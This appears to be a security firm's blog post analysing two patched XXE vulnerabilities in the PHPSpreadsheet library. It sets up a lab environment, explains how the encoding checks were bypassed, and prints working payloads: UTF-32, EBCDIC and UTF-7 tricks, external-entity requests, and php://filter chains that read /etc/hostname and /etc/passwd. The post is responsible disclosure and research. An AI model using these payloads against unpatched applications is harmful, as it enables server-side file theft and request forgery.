logo-unlock-security

Analysis of XXE 0days in PHPSpreadsheet < 3.4.0

Analysis of XXE 0days in PHPSpreadsheet < 3.4.0

During a penetration test, you often encounter web applications that are either built using third-party products or developed from scratch—and in both cases, external libraries invariably come into play. This practice typically enhances both code quality and security, while also giving penetration testers the chance to delve deep into the component’s source code to uncover new vulnerabilities and potentially gain access to the application.

This is exactly what happened to Antonio Rocco Spataro and Antonio Russo during a penetration test for Unlock Security on an application that utilizes the PHPSpreadsheet library. PHPSpreadsheet is the premier open-source PHP library for reading and writing spreadsheets in various formats, such as Excel and LibreOffice Calc, and it now boasts over 218 million installations along with more than 1,200 projects that rely on it as a dependency.

In this article, we’ll walk you through, step by step, how we managed to uncover two 0day vulnerabilities that enabled an XXE attack, circumventing both the library’s built-in protections and the subsequent patches deployed by its developers.

Setting up the test environment

As is often the case, to both protect the client's application and streamline our analysis, a dedicated test environment is set up for the testing process.

To allow anyone interested in exploring this vulnerability, we've made a ready-to-use test environment available by leveraging devcontainers with VS Code. The project structure is as follows:

.
├── composer.json
├── .devcontainer
│   ├── devcontainer.json
│   └── Dockerfile
├── index.php
├── payload.xlsx
└── .vscode
    └── launch.json

The composer.json file specifies the library name and version to be included in the project; in this case, only PHPSpreadsheet, and it must be a vulnerable version prior to 3.4.0. We opted for version 3.3.0:

{
    "require": {
       "phpoffice/phpspreadsheet": "3.3.0"
    }
}

The .devcontainer/Dockerfile sets up a testing environment with all the necessary dependencies required for the library to function correctly for our purposes:

FROM mcr.microsoft.com/devcontainers/php:8-bullseye

# Install system dependencies
RUN export DEBIAN_FRONTEND=noninteractive && \
    apt-get update && \
    apt-get -y install --no-install-recommends \
        libpng-dev \
        libxml2-dev \
        libzip-dev

# Install PHP extensions
RUN docker-php-ext-install gd xml zip

Within the .devcontainer/devcontainer.json file, instructions are provided for using the Dockerfile, initializing the project, and installing all the essential VS Code extensions to ease PHP code analysis:

{
    "name": "Pentesting PHPSpreadsheet",
    "context": ".",
    "dockerFile": "Dockerfile",
    "customizations": {
        "vscode": {
            "extensions": [
                "xdebug.php-debug"
            ]
        }
    },
    "portsAttributes": {
        "9000": {
            "label": "PHP XDebug",
            "onAutoForward": "ignore"
        }
    },
    "postCreateCommand": "composer install"
}

Next, we create a simple PHP snippet that uses PHPSpreadsheet to open our XLSX payload and print the contents of the active spreadsheet's cells:

<?php
require 'vendor/autoload.php';

use \PhpOffice\PhpSpreadsheet\Spreadsheet;
use \PhpOffice\PhpSpreadsheet\IOFactory;

$spreadsheet = new Spreadsheet();

$inputFileType = 'Xlsx';
$inputFileName = 'payload.xlsx';

$reader = IOFactory::createReader($inputFileType);
$spreadsheet = $reader->load($inputFileName);
$worksheet = $spreadsheet->getActiveSheet();
print_r($worksheet->toArray());

Once the Dev Containers extension is installed in VS Code, we're all set to launch our test environment and begin vulnerability analysis, though not before briefly explaining how the XLSX format works.

The XLSX format

XLSX files have become a widely adopted standard for managing spreadsheets. In essence, an XLSX file is a ZIP archive that contains several XML files structured according to the Office Open XML (OOXML) specifications.

To gain a clearer understanding of the structure and the key files that will be involved in exploiting the vulnerability, let's create a sample XLSX file:

Sample XLSX file

Once the file is saved, you can use the unzip utility to inspect the internal file structure:

$ unzip -l sample-file.xlsx

Archive:  sample-file.xlsx
  Length      Date    Time    Name
---------  ---------- -----   ----
      681  2025-03-02 12:32   xl/_rels/workbook.xml.rels
      878  2025-03-02 12:32   xl/workbook.xml
     2257  2025-03-02 12:32   xl/theme/theme1.xml
     4451  2025-03-02 12:32   xl/styles.xml
     2247  2025-03-02 12:32   xl/worksheets/sheet1.xml
      212  2025-03-02 12:32   xl/sharedStrings.xml
      571  2025-03-02 12:32   _rels/.rels
      731  2025-03-02 12:32   docProps/core.xml
      412  2025-03-02 12:32   docProps/app.xml
     1480  2025-03-02 12:32   [Content_Types].xml
---------                     -------
    13920                     10 files

Inside this archive, you’ll find documents such as workbook.xml, which defines the overall structure of the file and contains references to the individual spreadsheets:

<!-- xl/workbook.xml -->
...
<sheets>
    <sheet name="FirstSheet" sheetId="1" state="visible" r:id="rId2"/>
</sheets>
...

The sharedStrings.xml file plays a crucial role in managing text strings used in cells. Instead of storing the text directly in each cell, all unique strings are saved in this file so they can be reused multiple times, thus reducing redundancy and optimizing space.

In the sharedStrings.xml file, the root element is <sst> (shared string table), which encompasses all <si> (shared string item) elements. Each <si> contains the text, usually enclosed in a <t> (text) element, or a more complex structure called <r> (RichTextRun) to handle formatted text:

<!-- xl/sharedStrings.xml -->
<?xml version="1.0" encoding='UTF-7' standalone="yes"?>
<sst xmlns="http://schemas.openxmlformats.org/spreadsheetml/2006/main" count="1" uniqueCount="1">
   <si>
      <t xml:space="preserve">this is a string</t>
   </si>
</sst>

The sheet1.xml file contains the actual data for the cells in the first sheet. Cells containing text use the attribute t="s" to indicate that their content is a reference to the shared string table. Inside the cell, the <v> element holds a numeric index that points to the corresponding string in sharedStrings.xml.

<!-- xl/worksheets/sheet1.xml -->
...
<sheetData>
    <row r="1" customFormat="false" ht="12.8" hidden="false" customHeight="false" outlineLevel="0" collapsed="false">
        <c r="A1" s="0" t="s">
            <v>0</v>
        </c>
    </row>
</sheetData>
...

Each XML file thus plays a specific role in defining the appearance, data, and formatting of the document.

PHPSpreadsheet and the XXE vulnerabilities

Given the extensive reliance on XML files, it might seem natural to use a basic XXE payload to either read system files or trigger HTTP requests. One approach is to unpack the XLSX file, modify one of its XML files by inserting the malicious payload, repackage it as an XLSX archive, and then open it with PHPSpreadsheet.

Let's attempt this by modifying the sharedStrings.xml file as follows:

<?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<!DOCTYPE sst [
    <!ENTITY % ext SYSTEM "http://127.0.0.1:1337/we_got_xxe">
    %ext;
]>
<sst xmlns="http://schemas.openxmlformats.org/spreadsheetml/2006/main" count="1" uniqueCount="1">
   <si>
      <t xml:space="preserve">&xxe;</t>
   </si>
</sst>

In this scenario, we expect that an XXE-vulnerable parser would process the sharedStrings.xml file and issue an HTTP request to the specified address to load an external DTD file. When we run our code snippet in the test environment, we get the following output:

Fatal error: Uncaught PhpOffice\PhpSpreadsheet\Reader\Exception: Detected use of ENTITY in XML, spreadsheet file load() aborted to prevent XXE/XEE attacks in /workspaces/phpspreadsheet/vendor/phpoffice/phpspreadsheet/src/PhpSpreadsheet/Reader/Security/XmlScanner.php:82

Stack trace:
#0 /workspaces/phpspreadsheet/vendor/phpoffice/phpspreadsheet/src/PhpSpreadsheet/Reader/Xlsx.php(123): PhpOffice\PhpSpreadsheet\Reader\Security\XmlScanner->scan('<?xml version="...')
#1 /workspaces/phpspreadsheet/vendor/phpoffice/phpspreadsheet/src/PhpSpreadsheet/Reader/Xlsx.php(700): PhpOffice\PhpSpreadsheet\Reader\Xlsx->loadZip('xl/sharedString...', 'http://schemas....')
#2 /workspaces/phpspreadsheet/vendor/phpoffice/phpspreadsheet/src/PhpSpreadsheet/Reader/BaseReader.php(194): PhpOffice\PhpSpreadsheet\Reader\Xlsx->loadSpreadsheetFromFile('./assets/sample...')
#3 /workspaces/phpspreadsheet/index.php(13): PhpOffice\PhpSpreadsheet\Reader\BaseReader->load('./assets/sample...')
#4 {main}
  thrown in /workspaces/phpspreadsheet/vendor/phpoffice/phpspreadsheet/src/PhpSpreadsheet/Reader/Security/XmlScanner.php on line 82

PHPSpreadsheet successfully identifies the XXE attempt and halts the process. The next question is: how exactly does it perform this validation?

Security checks in PHPSpreadsheet

As the stack trace indicated earlier, PHPSpreadsheet’s security mechanisms are implemented in the class PhpOffice\PhpSpreadsheet\Reader\Security\XmlScanner, specifically within the scan($xml) method, which is defined as follows:

public function scan($xml): string
{
    $xml = "$xml";

    $xml = $this->toUtf8($xml);

    // Don't rely purely on libxml_disable_entity_loader()
    $pattern = '/\\0?' . implode('\\0?', str_split($this->pattern)) . '\\0?/';

    if (preg_match($pattern, $xml)) {
        throw new Reader\Exception('Detected use of ENTITY in XML, spreadsheet file load() aborted to prevent XXE/XEE attacks');
    }

    // …
}

The check operates by scanning the XML for the string <!DOCTYPE, which may be interleaved with null bytes (e.g., \0<\0!\0D\0O\0C\0T\0Y\0P\0E\0) to account for encodings such as UTF-16 (commonly used in Windows).

Before performing this scan, the XML is converted to UTF-8 by the toUtf8($xml) method, whose implementation is as follows:

private function toUtf8(string $xml): string
{
    $charset = $this->findCharSet($xml);
    if ($charset !== 'UTF-8') {
        $xml = self::forceString(mb_convert_encoding($xml, 'UTF-8', $charset));

        $charset = $this->findCharSet($xml);
        if ($charset !== 'UTF-8') {
            throw new Reader\Exception('Suspicious Double-encoded XML, spreadsheet file load() aborted to prevent XXE/XEE attacks');
        }
    }

    return $xml;
}

To determine the character encoding used in the XML, the method findCharSet($xml) is employed. This function searches for instances of the string encoding="<codifica>", accommodating any extra spaces and the use of either single or double quotes. If an encoding is found, it is returned (in uppercase); if not, it defaults to UTF-8.

private function findCharSet(string $xml): string
{
    $patterns = [
        '/encoding\\s*=\\s*"([^"]*]?)"/',
        "/encoding\\s*=\\s*'([^']*?)'/",
    ];

    foreach ($patterns as $pattern) {
        if (preg_match($pattern, $xml, $matches)) {
            return strtoupper($matches[1]);
        }
    }

    return 'UTF-8';
}

CVE-2024-47873

At first glance, PHPSpreadsheet's security measures may seem both simple and effective, but are they really foolproof? Under what conditions can an XXE payload slip past all the checks?

The answer lies in the XML specification, specifically in the "Autodetection of Character Encodings (Non-Normative)" section. This part of the standard explains that since every XML entity must start with an encoding declaration, and the very first characters are always <?xml, a parser can determine the encoding by reading just 2 to 4 bytes. The encoding is inferred by matching these bytes against the following table:

  • 00 00 00 3C, 3C 00 00 00, 00 00 3C 00, 00 3C 00 00 corresponds to UCS-4 or any other 32-bit encoding in which ASCII characters are encoded using their standard ASCII values.
  • 00 3C 00 3F indicates UTF-16BE, ISO-10646-UCS-2 (big endian), or other 16-bit big endian encodings where ASCII characters remain intact.
  • 3C 00 3F 00 Matches UTF-16LE, ISO-10646-UCS-2 (little endian), or similar 16-bit little endian encodings where ASCII characters remain intact.
  • 3C 3F 78 6D represents UTF-8, ISO 646, ASCII, partially ISO 8859, Shift-JIS, EUC, or other 7- or 8-bit encodings, as well as variable-length encodings where the ASCII characters retain their positions, lengths, and values.
  • 4C 6F A7 94 corresponds to the EBCDIC encoding

Because the scan($xml) function only flags an XXE attempt if it finds either the literal string <!DOCTYPE or its variant interleaved with null bytes \0<\0!\0D\0O\0C\0T\0Y\0P\0E\0, we can exploit this by using a 32-bit encoding that inserts more than one null byte before each character. For example, the resulting string could look like this: \0\0\0<\0\0\0!\0\0\0D\0\0\0O\0\0\0C\0\0\0T\0\0\0Y\0\0\0P\0\0\0E\0\0\0, that is three null bytes preceding every ASCII character. To achieve this, we can use either UTF-32BE or UTF-32LE encoding.

Some might object that our payload is converted to UTF-8 before the security checks run, thereby stripping out the null bytes and invalidating our approach.

However, a closer look at the implementations of the toUtf8($xml) and findCharSet($xml) methods reveals why this isn't the case:

private function toUtf8(string $xml): string
{
    $charset = $this->findCharSet($xml);
    if ($charset !== 'UTF-8') {
        $xml = self::forceString(mb_convert_encoding($xml, 'UTF-8', $charset));

        $charset = $this->findCharSet($xml);
        if ($charset !== 'UTF-8') {
            throw new Reader\Exception('Suspicious Double-encoded XML, spreadsheet file load() aborted to prevent XXE/XEE attacks');
        }
    }

    return $xml;
}

private function findCharSet(string $xml): string
{
    $patterns = [
        '/encoding\\s*=\\s*"([^"]*]?)"/',
        "/encoding\\s*=\\s*'([^']*?)'/",
    ];

    foreach ($patterns as $pattern) {
        if (preg_match($pattern, $xml, $matches)) {
            return strtoupper($matches[1]);
        }
    }

    return 'UTF-8';
}

Notice that the conversion to UTF-8 only occurs when the declared encoding isn't UTF-8. However, the encoding is detected using regular expressions that fail to account for possible null bytes. If none of these expressions detect an encoding, the function defaults to returning "UTF-8". Consequently, if our payload's encoding declaration is in UTF-32BE, it goes unnoticed and no conversion takes place.

Even though our XML payload isn't converted, it still functions as intended because libxml2, the underlying library PHPSpreadsheet relies on for XML parsing, adheres to the standard. It correctly determines the encoding by reading the first 4 bytes of the payload.

With that in mind, we create our payload in UTF-32BE. For this purpose, we use CyberChef, an online tool that facilitates various encoding conversions.

Payload in UTF-32BE encoding

We copy the payload into CyberChef's input window, select UTF-32BE as the target encoding, and save the resulting file, overwriting the existing sharedStrings.xml. Next, we repackage the files into a ZIP archive with an XLSX extension and run our proof-of-concept, ensuring that an HTTP server is listening on port 1337 (for instance, by running php -S 127.0.0.1:1337):

HTTP request via XXE

The fix for correcting the issue

The first remedy proposed by the PHPSpreadsheet developers involved modifying the regular expression responsible for detecting the doctype. The updated expression now accounts for the presence of multiple null bytes rather than just one. In other words, the original pattern:

$pattern = '/\\0?' . implode('\\0?', str_split($this->pattern)) . '\\0?/'

was replaced with this more robust version:

$pattern = '/\0*' . implode('\0*', mb_str_split($this->pattern, 1, 'UTF-8')) . '\0*/'

Bypassing the fix

Those paying close attention might recall that among the automatically detected encodings is EBCDIC-INT, which, unlike UTF-based encodings, does not use null bytes. This loophole effectively bypasses the security checks once again.

Payload in EBCDIC encoding

To address this issue, the developers restricted the use of the EBCDIC encoding by modifying the findCharSet($xml) method as follows:

private function findCharSet(string $xml): string
{
    if (substr($xml, 0, 4) === "\x4c\x6f\xa7\x94") {
        throw new Reader\Exception('EBCDIC encoding not permitted');
    // …
}

CVE-2024-48917

Following the release of a new PHPSpreadsheet version that patched the previous vulnerability, researchers Antonio Rocco Spataro and Antonio Russo continued analyzing the library. They discovered yet another potential vector for achieving an XXE attack.

Let's revisit the findCharSet($xml) method:

private function findCharSet(string $xml): string
{
    $patterns = [
        '/encoding\\s*=\\s*"([^"]*]?)"/',
        "/encoding\\s*=\\s*'([^']*?)'/",
    ];

    foreach ($patterns as $pattern) {
        if (preg_match($pattern, $xml, $matches)) {
            return strtoupper($matches[1]);
        }
    }

    return 'UTF-8';
}

This function iterates over two regular expressions, checking for an encoding="<codifica>" (double quotes) or encoding='<codifica>' (single quotes) declaration within the XML file. The first match found determines the encoding used.

However, if both patterns match different parts of the XML file, the function will always return the value specified inside double quotes, as it's processed first.

For example, if we craft an XML header like <?xml version="1" encoding='A' encoding="B">, the detected encoding would be "B". The same applies to the following case:

<?xml version="1" encoding='A'>
<root>
    <aTag attribute="value">text</aTag>
    <!--encoding="B"-->
</root>

Why is this useful? In the previous CVE, we established that scan($xml) fails to detect a <!DOCTYPE> declaration when the XML file uses an encoding other than UTF-8 or UTF-16. However, the libxml2 library, which PHPSpreadsheet relies on, can still recognize and correctly process the encoding.

This creates a new XXE vulnerability if we can manipulate the encoding to be recognized as UTF-8 by PHPSpreadsheet (thus bypassing its security checks) while still being parsed correctly by libxml2.

We already know that every XML parser must support at least a handful of standard encodings, including 7-bit encodings like UTF-7. A file encoded in UTF-7 is typically identified by the sequence 3C 3F 78 6D (the <?xml string). However, because multiple encodings start with this sequence, we must explicitly specify encoding='UTF-7' to ensure libxml2 interprets the file correctly.

The key advantage of UTF-7 is that it encodes data using ASCII characters, which allows us to mix valid UTF-8 content with segments encoded in UTF-7. This means we can selectively encode specific characters, such as < as +ADw-!DOCTYPE making it unrecognizable to PHPSpreadsheet's security checks.

The resulting payload would look like this:

<?xml version = "1.0" encoding='UTF-7'?>
+ADw-!DOCTYPE sst [
    <!ENTITY % ext SYSTEM "http://127.0.0.1:1337/we_got_xxe">
    %ext;
]>

   <si>
      <t xml:space="preserve">this is a string</t>
   </si>

However, there's a catch: PHPSpreadsheet will detect the encoding='UTF-7' declaration and convert the XML file to UTF-8, making the malicious payload visible again. We can achieve this by appending a misleading encoding declaration inside an XML comment like <!--encoding="UTF-8"-->.

Here's the final payload:

<?xml version = "1.0" encoding='UTF-7'?>
+ADw-!DOCTYPE sst [
    <!ENTITY % ext SYSTEM "http://127.0.0.1:1337/we_got_xxe">
    %ext;
]>

   <si>
      <t xml:space="preserve">this is a string</t>
   </si>

<!--encoding="UTF-8"-->

Now, we insert this payload into an XLSX file, execute it, and check the result:

Check bypassed via fake encoding

As expected, PHPSpreadsheet fails to detect the attack, and shortly after, we observe an HTTP request to http://127.0.0.1:1337/we_got_xxe.

From blind SSRF to arbitrary file read

So far, we've demonstrated how to achieve blind SSRF through an XXE vulnerability. At first glance, it might seem like we could simply modify our XXE payload to read and exfiltrate data, using something like this:

<!DOCTYPE sst [
    <!ENTITY xxe SYSTEM "file:///etc/hostname">
]>
<sst xmlns="http://schemas.openxmlformats.org/spreadsheetml/2006/main" count="1" uniqueCount="1">
   <si>
      <t xml:space="preserve">&xxe;</t>
   </si>
</sst>

However, by default, libxml does not enable the LIBXML_NOENT option, which is required for replacing entities within an XML file. This restriction applies only to external entities, meaning internal entity substitution still works as expected. For example, with the following payload, the first cell in the XLSX file would contain the string "a sample string":

<!DOCTYPE sst [
    <!ENTITY xxe "a sample string">
]>
<sst xmlns="http://schemas.openxmlformats.org/spreadsheetml/2006/main" count="1" uniqueCount="1">
   <si>
      <t xml:space="preserve">&xxe;</t>
   </si>
</sst>

Now, the key question is: can we exploit this behavior to read a file's contents? Let's start with the following payload:

<!DOCTYPE sst [
    <!ENTITY % hostname SYSTEM "file:///etc/hostname">
    %hostname;
]>
<sst xmlns="http://schemas.openxmlformats.org/spreadsheetml/2006/main" count="1" uniqueCount="1">
   <si>
      <t xml:space="preserve">&xxe;</t>
   </si>
</sst>

This works by injecting the contents of /etc/hostname into the variable hostname, which is then inserted into the XML file wherever %hostname;; appears. However, since we still need an xxe entity to perform the actual substitution, this alone won't work.

Now, consider a scenario where the hostname itself was something like <!ENTITY xxe "a very unusual hostname">. This would effectively define a new xxe entity, making it available for substitution inside sharedStrings.xml.

If we could somehow force the inclusion of a prefix and a suffix, we could control the structure of the injected entity and use it to leak arbitrary files.

The solution lies in WrapWrap, a tool developed by Ambionics. WrapWrap chains php://filter gadgets to add arbitrary prefixes and suffixes to file contents, effectively transforming raw file data into a usable XML entity.

WrapWrap uses a series of encoding conversions to manipulate character representation, allowing us to prepend and append custom data. Here's an example of how different character encodings can be leveraged:

conversions = {
    b"0": "convert.iconv.UTF8.UTF16LE|convert.iconv.UTF8.CSISO2022KR|convert.iconv.UCS2.UTF8|convert.iconv.8859_3.UCS2",
    b"1": "convert.iconv.ISO88597.UTF16|convert.iconv.RK1048.UCS-4LE|convert.iconv.UTF32.CP1167|convert.iconv.CP9066.CSUCS4",
    b"2": "convert.iconv.L5.UTF-32|convert.iconv.ISO88594.GB13000|convert.iconv.CP949.UTF32BE|convert.iconv.ISO_69372.CSIBM921",
    b"3": "convert.iconv.L6.UNICODE|convert.iconv.CP1282.ISO-IR-90|convert.iconv.ISO6937.8859_4|convert.iconv.IBM868.UTF-16LE",
    b"4": "convert.iconv.CP866.CSUNICODE|convert.iconv.CSISOLATIN5.ISO_6937-2|convert.iconv.CP950.UTF-16BE",
    b"5": "convert.iconv.UTF8.UTF16LE|convert.iconv.UTF8.CSISO2022KR|convert.iconv.UTF16.EUCTW|convert.iconv.8859_3.UCS2",
    b"6": "convert.iconv.INIS.UTF16|convert.iconv.CSIBM1133.IBM943|convert.iconv.CSIBM943.UCS4|convert.iconv.IBM866.UCS-2",
    b"7": "convert.iconv.851.UTF-16|convert.iconv.L1.T.618BIT|convert.iconv.ISO-IR-103.850|convert.iconv.PT154.UCS4",
    b"8": "convert.iconv.ISO2022KR.UTF16|convert.iconv.L6.UCS2",
    b"9": "convert.iconv.CSIBM1161.UNICODE|convert.iconv.ISO-IR-156.JOHAB",
    b"A": "convert.iconv.8859_3.UTF16|convert.iconv.863.SHIFT_JISX0213",
    b"a": "convert.iconv.CP1046.UTF32|convert.iconv.L6.UCS-2|convert.iconv.UTF-16LE.T.61-8BIT|convert.iconv.865.UCS-4LE",
    b"B": "convert.iconv.CP861.UTF-16|convert.iconv.L4.GB13000",
    b"b": "convert.iconv.JS.UNICODE|convert.iconv.L4.UCS2|convert.iconv.UCS-2.OSF00030010|convert.iconv.CSIBM1008.UTF32BE",
    b"C": "convert.iconv.UTF8.CSISO2022KR",
    b"c": "convert.iconv.L4.UTF32|convert.iconv.CP1250.UCS-2",
    b"D": "convert.iconv.INIS.UTF16|convert.iconv.CSIBM1133.IBM943|convert.iconv.IBM932.SHIFT_JISX0213",
    b"d": "convert.iconv.INIS.UTF16|convert.iconv.CSIBM1133.IBM943|convert.iconv.GBK.BIG5",
    # …
}

WrapWrap takes three key inputs: the file path (to the target file), a prefix and suffix (which help shape the payload) and the number of bytes to extract.

python wrapwrap.py --help
usage: wrapwrap.py [-h] [-o OUTPUT] [-p PADDING_CHARACTER] [-f] path prefix suffix nb_bytes

Generates a php://filter wrapper that adds a prefix and a suffix to the contents of a file.

Example:

    $ ./wrapwrap.py /etc/passwd '<root><test>' '</test></root>' 100
    [*] Dumping 108 bytes from /etc/passwd.
    [+] Wrote filter chain to chain.txt (size=88781).
    $ php -r 'echo file_get_contents(file_get_contents("chain.txt"));'
    <root><test>root:x:0:0:root:/root:/bin/bash=0Adaemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin=0Abin:x:2:2:bin:/bin:/usr/</test></root>

positional arguments:
  path                  Path to the file
  prefix                A string to write before the contents of the file
  suffix                A string to write after the contents of the file
  nb_bytes              Number of bytes to dump. It will be aligned with 9

options:
  -h, --help            show this help message and exit
  -o, --output OUTPUT   File to write the payload to. Defaults to chain.txt
  -p, --padding-character PADDING_CHARACTER
                        Character to pad the prefix and suffix. Defaults to `M`.
  -f, --from-file       If set, prefix and suffix indicate files to load their value from, instead of the value itself

We can generate a wrapped payload for /etc/hostname like this:

python wrapwrap.py /etc/hostname "<\!ENTITY xxe '" "'>" 54
[*] Dumping 54 bytes from /etc/hostname.
[+] Wrote filter chain to chain.txt (size=49312).

The output of this command is a php://filter chain that looks something like this:

php://filter/convert.base64-encode|convert.base64-encode|convert.iconv.855.UTF7|convert.base64-encode|convert.iconv.855.UTF7|convert.base64-encode|convert.iconv.855.UTF7|convert.base64-decode|convert.iconv.855.UTF7|convert.base64-decode|convert.iconv.855.UTF7|convert.base64-decode|convert.iconv.855.UTF7|convert.base64-decode|convert.quoted-printable-encode|convert.base64-encode|convert.base64-encode|convert.base64-encode|convert.quoted-printable-encode|convert.iconv.855.UTF7|convert.iconv.8859_3.UTF16|convert.iconv.863.SHIFT_JISX0213|convert.base64-decode|convert.base64-encode|convert.quoted-printable-encode|convert.iconv.855.UTF7|convert.iconv.8859_3.UTF16|convert.iconv.863.SHIFT_JISX0213|convert.base64-decode|convert.base64-encode|convert.quoted-printable-encode|convert.iconv.855.UTF7|convert.iconv.8859_3.UTF16|
    …
convert.iconv.IBM932.SHIFT_JISX0213|convert.base64-decode|convert.base64-encode|convert.iconv.855.UTF7|convert.iconv.CP869.UTF-32|convert.iconv.MACUK.UCS4|convert.iconv.UTF16BE.866|convert.iconv.MACUKRAINIAN.WCHAR_T|convert.base64-decode|convert.base64-encode|convert.iconv.855.UTF7|convert.base64-decode|dechunk|convert.base64-decode|convert.base64-decode/resource=/etc/hostname

This gives us the final payload to red the /etc/hostname file:

<?xml version="1.0" encoding='UTF-7'?>
+ADw-!DOCTYPE sst [
    <!ENTITY % hostname SYSTEM "PHP_FILTER_URL_GENERATED_BY_WRAPWRAP" >
    %hostname;
]>
<sst xmlns="http://schemas.openxmlformats.org/spreadsheetml/2006/main" count="1" uniqueCount="1">
    <si>
        <t xml:space="preserve">&xxe;</t>
    </si>
</sst>
<!--encoding="UTF-8"-->
/etc/hostname via XXE

To leak other files, such as /etc/passwd, simply replace the target file path at the very end of the php://filter chain:

/etc/passwd via XXE

Conclusions

The PHPSpreadsheet team responded swiftly to the vulnerability reports submitted by Antonio Rocco Spataro and Antonio Russo, actively involving them in the remediation process. Starting from version 3.4.0, the library addresses the reported security flaws by completely reworking the affected methods, ensuring a more robust and secure implementation.

Francesco Marano
Francesco Marano
CEO | Cyber Security Consultant
www.unlock-security.it

Amo far fare ai software cose diverse da quelle per cui sono stati progettati!Ciao, sono Francesco e sono un esperto di cyber security con anni di esperienza come Penetration Tester. Nel tempo libero svolgo ricerche in ambito sicurezza per trovare nuove vulnerabilità. Sono speaker ad eventi di settore per parlare delle mie ricerche.Oggi sono alla guida di Unlock Security, un'azienda specializzata in offensive security.

Related Posts